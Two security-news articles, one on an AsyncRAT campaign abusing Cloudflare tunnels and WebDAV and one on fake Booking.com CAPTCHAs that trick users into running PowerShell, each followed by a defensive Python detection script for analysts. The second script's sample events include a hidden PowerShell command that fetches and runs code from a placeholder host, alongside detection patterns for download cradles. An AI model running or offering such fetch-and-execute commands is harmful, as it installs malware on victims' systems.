
AsyncRAT Campaign Abuses Cloudflare Services to Hide Malware Operations

Cybercriminals distributing the AsyncRAT remote access trojan are exploiting Cloudflare’s free-tier services and TryCloudflare tunneling domains to conceal malicious infrastructure behind widely trusted platforms. By hosting WebDAV servers through Cloudflare, attackers are able to mask command-and-control activity, making detection significantly more difficult for conventional security tools that often whitelist Cloudflare traffic. 

The campaign typically begins with phishing emails that contain Dropbox links. These links deliver files using double extensions, such as .pdf.url, which are designed to mislead recipients into believing they are opening legitimate documents. When the files are opened, victims unknowingly download multi-stage scripts from TryCloudflare domains. At the same time, a genuine PDF document is displayed to reduce suspicion and delay user awareness of malicious activity. 

A notable aspect of this operation is the attackers’ use of legitimate software sources. The malware chain includes downloading official Python distributions directly from Python.org. Once installed, a full Python environment is set up on the compromised system. This environment is then leveraged to execute advanced code injection techniques, specifically targeting the Windows explorer.exe process, allowing the malware to run stealthily within a trusted system component. 

To maintain long-term access, the attackers rely on multiple persistence mechanisms. These include placing scripts such as ahke.bat and olsm.bat in Windows startup folders so they automatically execute when a user logs in. The campaign also uses WebDAV mounting to sustain communication with command-and-control servers hosted through Cloudflare tunnels. 

The threat actors heavily employ so-called “living-off-the-land” techniques, abusing built-in Windows tools such as PowerShell, Windows Script Host, and other native utilities. By blending malicious behavior with legitimate system operations, the attackers further complicate detection and analysis, as their activity closely resembles normal administrative actions. 

According to research cited by Trend Micro, the use of Cloudflare’s infrastructure creates a significant blind spot for many security solutions. Domains containing “trycloudflare.com” often appear trustworthy, allowing AsyncRAT payloads to be delivered without triggering immediate alerts. This abuse of reputable services highlights how attackers increasingly rely on legitimate platforms to scale operations and evade defenses. 

Security researchers warn that although known malicious repositories and infrastructure may be taken down, similar campaigns are likely to reappear using new domains and delivery methods. Monitoring WebDAV connections, scrutinizing traffic involving TryCloudflare domains, and closely analyzing phishing attachments remain critical steps in identifying and mitigating AsyncRAT infections.
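The monitoring steps above can be turned into a small triage script. The following is an added example written for this page, not code from the original post or from Trend Micro: it scans constructed proxy log lines and constructed e-mail attachment names for the three indicators the article names (TryCloudflare tunnel domains, WebDAV traffic, and double-extension attachments), and correlates a client that both talks to a TryCloudflare tunnel and fetches a Python installer from python.org, since the article describes that combination as part of the chain. The log format, host names, client addresses and file names are all assumptions made for the example.

```python
"""Added example: flag the AsyncRAT indicators described above in
constructed proxy logs and attachment names. The log format and all
sample values are assumptions, not data from the original post."""
import re
from dataclasses import dataclass
from typing import Optional

# WebDAV-specific HTTP methods (RFC 4918); a mounted share produces these.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "MOVE", "COPY", "LOCK", "UNLOCK"}
TRYCLOUDFLARE_RE = re.compile(r"(^|\.)trycloudflare\.com$", re.IGNORECASE)
PYTHON_ORG_RE = re.compile(r"^(www\.)?python\.org$", re.IGNORECASE)
# A document-looking extension immediately followed by an executable-ish one.
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.(url|lnk|exe|js|vbs|bat|cmd|hta)$", re.IGNORECASE)
# Assumed proxy format: "<ts> <client> <method> <host> <path> <status>"
PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


@dataclass(frozen=True)
class Finding:
    source: str   # "proxy", "mail" or "correlation"
    reason: str   # short machine-readable tag
    detail: str   # human-readable context


def parse_proxy_line(line: str) -> Optional[dict]:
    """Return the fields of one proxy line, or None if it does not match."""
    m = PROXY_RE.match(line.strip())
    return m.groupdict() if m else None


def proxy_findings(rec: dict) -> list:
    """Per-line checks: tunnel domain and WebDAV method."""
    out = []
    if TRYCLOUDFLARE_RE.search(rec["host"]):
        out.append(Finding("proxy", "trycloudflare-domain", f"{rec['client']} -> {rec['host']}"))
    if rec["method"] in WEBDAV_METHODS:
        out.append(Finding("proxy", "webdav-method", f"{rec['method']} {rec['host']}{rec['path']}"))
    return out


def attachment_findings(name: str) -> list:
    """Flag names such as invoice.pdf.url that hide the real extension."""
    if DOUBLE_EXT_RE.search(name):
        return [Finding("mail", "double-extension", name)]
    return []


def scan(proxy_lines, attachment_names) -> list:
    """Run all checks and add a correlation finding when one client both
    reaches a TryCloudflare tunnel and downloads a Python installer."""
    findings = []
    tunnel_clients, installer_clients = set(), set()
    for line in proxy_lines:
        rec = parse_proxy_line(line)
        if rec is None:
            continue
        hits = proxy_findings(rec)
        findings.extend(hits)
        if any(h.reason == "trycloudflare-domain" for h in hits):
            tunnel_clients.add(rec["client"])
        if PYTHON_ORG_RE.match(rec["host"]) and rec["path"].lower().endswith((".exe", ".zip")):
            installer_clients.add(rec["client"])
    for client in sorted(tunnel_clients & installer_clients):
        findings.append(Finding("correlation", "python-install-plus-tunnel", client))
    for name in attachment_names:
        findings.extend(attachment_findings(name))
    return findings


# Constructed sample data (not real traffic); the tunnel subdomain is made up.
SAMPLE_PROXY = [
    "2024-05-01T10:00:01Z 10.0.0.12 GET www.python.org /ftp/python/python-installer.exe 200",
    "2024-05-01T10:00:05Z 10.0.0.12 PROPFIND made-up-tunnel-name.trycloudflare.com /share/ 207",
    "2024-05-01T10:00:09Z 10.0.0.12 GET made-up-tunnel-name.trycloudflare.com /share/stage2.bat 200",
    "2024-05-01T10:01:00Z 10.0.0.33 GET intranet.corp.example /index.html 200",
]
SAMPLE_ATTACHMENTS = ["agenda.pdf", "itinerary.pdf.url", "report.docx"]

if __name__ == "__main__":
    for f in scan(SAMPLE_PROXY, SAMPLE_ATTACHMENTS):
        print(f"[{f.source}] {f.reason}: {f.detail}")
```

Python.org traffic on its own is not flagged, only its co-occurrence with tunnel traffic from the same client; in production the same correlation would be keyed on a time window rather than the whole log.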

Fake Booking.com CAPTCHAs Are Tricking Travelers Into Installing Malware

Cybercriminals are exploiting vacationers in a deceptive phishing campaign that mimics the well-known online travel agency, Booking.com. According to cybersecurity researchers at Malwarebytes Labs, this scam uses bogus CAPTCHA prompts to trick users into giving hackers remote access to their devices, compromising both personal and financial information.

The attack typically starts with links shared on social media platforms or gaming websites, sometimes even appearing as sponsored advertisements. These links redirect users to fraudulent sites impersonating Booking.com—a legitimate OTA (online travel agency) widely used for booking flights, hotels, car rentals, and travel packages.

Once a user clicks on the deceptive link, a counterfeit CAPTCHA prompt appears, asking them to check a box. This step secretly copies a command to the user's clipboard. The next prompt instructs users to run a specific keystroke combination on their device—a red flag, as this is not part of any authentic CAPTCHA process.

Behind the scenes, the copied text contains a PowerShell command. Executing it initiates the download of several files that install a Remote Access Tool (RAT) known as Backdoor.AsyncRAT. This software enables attackers to remotely monitor and take control of the victim's system.

How to identify and protect yourself from the Booking.com RAT scam:

Always verify URLs: Malwarebytes Labs highlights that these fake domains shift regularly and vary in how legitimate they appear. Some might resemble real Booking.com URLs, like (booking.)guestsalerts[.]com, while others are more obscure, such as kvhandelregis[.]com. The safest approach is to avoid clicking on social media links or ads and instead navigate directly to the website by typing the URL into your browser’s address bar.

Avoid using search engines for travel bookings: Searching for travel deals on platforms like Google may expose you to “malvertising,” where scammers replicate trusted brands to lure users through top-ranking sponsored results. It’s better to book directly with hotels, airlines, or verified OTAs.

Don’t trust CAPTCHA forms from unknown sources:
"Be wary of following instructions, such as executing commands, from websites, CAPTCHA forms, or social media videos, which can easily trick you into installing malware."

Disabling JavaScript in your browser can block clipboard-based exploits, though it may also interfere with the functionality of many legitimate websites.
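From the endpoint side, the chain described above (a command pasted from the clipboard and run by the user, which then downloads further files) leaves a process-creation trail that can be checked automatically. The following is an added example written for this page, not code from the original post or from Malwarebytes: it evaluates constructed process-creation events and reports a shell that was launched by the user's desktop session and whose command line also carries a download cradle, a hidden or encoded invocation, or an embedded URL. The event fields, the assumption that a command typed by hand shows explorer.exe as its parent, and all sample command lines and host names are assumptions made for the example.

```python
"""Added example: rate process-creation events for the fake-CAPTCHA
pattern described above. Event layout and all samples are constructed
assumptions, not data from the original post."""
import re
from dataclasses import dataclass

# Interpreters a pasted one-liner is typically run through.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Assumption: a command the user starts from the desktop has explorer.exe as parent.
USER_PARENTS = {"explorer.exe"}
# Download / execution primitives common in PowerShell one-liners.
CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
    r"invoke-expression|iex|start-bitstransfer)\b",
    re.IGNORECASE,
)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s+", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Return the list of indicator tags that apply to one event."""
    reasons = []
    if basename(ev.image) not in SHELLS:
        return reasons
    if basename(ev.parent_image) in USER_PARENTS:
        reasons.append("shell-launched-from-explorer")
    if CRADLE_RE.search(ev.command_line):
        reasons.append("download-cradle")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("hidden-or-encoded")
    if URL_RE.search(ev.command_line):
        reasons.append("url-in-command-line")
    return reasons


def is_suspicious(ev: ProcessEvent) -> bool:
    """A user-launched shell alone is normal; require at least one more indicator."""
    reasons = score_event(ev)
    return "shell-launched-from-explorer" in reasons and len(reasons) >= 2


# Constructed sample events; the host name is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe", "CORP\\alice"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr http://captcha-check.example.invalid/v | iex"', "CORP\\alice"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\scripts\\sync.ps1 -Uri https://intranet.corp.example/feed", "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.user:22} suspicious={is_suspicious(ev)} {score_event(ev)}")
```

The third event shows the rule's boundary: a scheduled job that fetches an internal URL carries a cradle and a URL but is not started from the user's desktop, so it is left for other rules rather than flagged here.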

Cybersecurity experts continue to stress vigilance, especially during peak travel seasons when scammers often ramp up such campaigns.